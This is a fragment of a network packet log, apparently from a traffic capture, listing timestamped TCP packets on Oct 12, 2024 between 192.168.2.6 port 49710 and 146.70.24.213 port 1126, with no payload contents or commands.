Oct 12, 2024 20:30:04.863610029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863645077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863656044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863678932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863683939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863711119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863744020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863755941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863776922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863810062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863822937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863842010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863879919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863912106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863924026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863945007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863976955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863985062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.864011049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.864016056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.864042997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.864075899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.864088058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.864104986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.864140034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.864151001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.914293051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948388100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948457956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948493958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948527098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948561907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948563099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948596001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948625088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948631048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948663950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948673964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948695898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948729038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948739052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948764086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948796034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948808908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948829889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948867083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.948875904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.948909998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950001001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950031042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950087070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950134039 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950139999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950172901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950206041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950237036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950237036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950264931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950270891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950320959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950354099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950364113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950404882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950438023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950448990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950479984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950490952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950544119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950576067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950589895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950630903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950664043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950687885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950714111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950746059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950788975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950797081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950833082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950875998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950884104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950927019 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.950936079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.950988054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951020002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951030970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951071024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951103926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951137066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951147079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951169014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951201916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951211929 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951232910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951246977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951266050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951294899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951312065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951328039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951364040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951402903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951419115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951453924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951482058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951495886 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951514959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951522112 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951548100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951575994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951592922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951607943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951642990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951647997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951674938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951708078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951716900 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951740026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951776028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951780081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951807976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951843977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951874018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951889038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951906919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951915979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.951946020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.951976061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952008963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952016115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.952042103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952081919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.952689886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952789068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952833891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.952843904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952877998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952887058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.952929020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952963114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.952971935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.952996016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953030109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953041077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.953062057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953094006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953125954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953141928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.953159094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953191042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953202009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.953223944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953227997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.953257084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.953295946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955374002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955424070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955457926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955490112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955513954 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955539942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955542088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955575943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955625057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955629110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955662966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955704927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955713987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955765009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955797911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955842972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955849886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955883026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955914021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955928087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955954075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.955965042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.955997944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956041098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956051111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956079960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956123114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956129074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956162930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956193924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956208944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956228018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956259966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956293106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956301928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956325054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956358910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956366062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956403017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956429005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956439018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956473112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956506968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956517935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956540108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956577063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956577063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956617117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956650019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956660986 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956682920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956691027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.956716061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.956763029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.041321039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041435003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041470051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041505098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041512012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.041538000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041574955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.041594982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041630030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041641951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.041662931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.041711092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.042892933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.042968035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043025017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043065071 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043113947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043160915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043170929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043205023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043257952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043257952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043311119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043343067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043418884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043453932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043504953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043507099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043507099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043561935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043587923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043617010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043652058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043658018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043685913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043720007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043724060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043754101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043786049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043796062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043819904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043853045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043860912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043885946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043919086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043927908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.043951988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043986082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.043987989 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044018984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044053078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044064045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044085979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044118881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044123888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044148922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044182062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044186115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044215918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044250011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044258118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044284105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044316053 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044322014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044348955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044378042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044393063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044410944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044445038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044454098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044477940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044512033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044518948 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044544935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044579983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044584036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044612885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044646025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044650078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044678926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044713020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044717073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044745922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044780016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044784069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044812918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044850111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044852018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.044878006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.044919968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.045871019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.045942068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.045979023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.045989037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046013117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046049118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046055079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046082973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046117067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046123981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046149969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046184063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046188116 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046216965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046251059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046258926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046284914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046317101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046324968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046355963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046390057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046392918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046422005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046456099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046469927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046489954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046524048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.046531916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.046564102 CEST	1126	49710	146.70.24.213	192.168.2.6
